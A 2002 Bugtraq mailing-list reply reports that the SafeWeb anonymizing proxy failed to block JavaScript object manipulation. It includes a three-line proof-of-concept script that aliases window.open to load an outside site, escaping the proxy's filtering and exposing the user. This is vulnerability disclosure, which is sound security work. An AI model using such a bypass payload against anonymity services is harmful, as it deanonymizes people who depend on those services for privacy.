[24298] in bugtraq
Re: Deanonymizing SafeWeb Users
daemon@ATHENA.MIT.EDU (Alexander K. Yezhov)
Fri Feb 15 17:05:47 2002
Date: Fri, 15 Feb 2002 21:04:35 +0300
From: "Alexander K. Yezhov" <admin@leader.ru>
Reply-To: "Alexander K. Yezhov" <admin@leader.ru>
Message-ID: <4722870625.20020215210435@leader.ru>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Following upon the letter of Tuesday, February 12, 2002:
DM> Although SafeWeb's Web anonymizing service has been shut down
DM> since December, they claimed it was the "most widely used online
DM> privacy service in the world".
I don't know who is using the SafeWeb engine now, but before this
service was closed I've had a chance to make sure that it fails to
catch object manipulations. Tested with simple script:
myObj=new Object(window);
myObj.myMethod = open;
myObj.myMethod('http://tools-on.net');
Best regards, Alexander
-----------------------------------------------------------------------
MCP+I, MCSE on Windows NT 4, MCSE on Windows 2000
http://leader.ru http://tools-on.net (Security & Privacy on the Net)
-----------------------------------------------------------------------
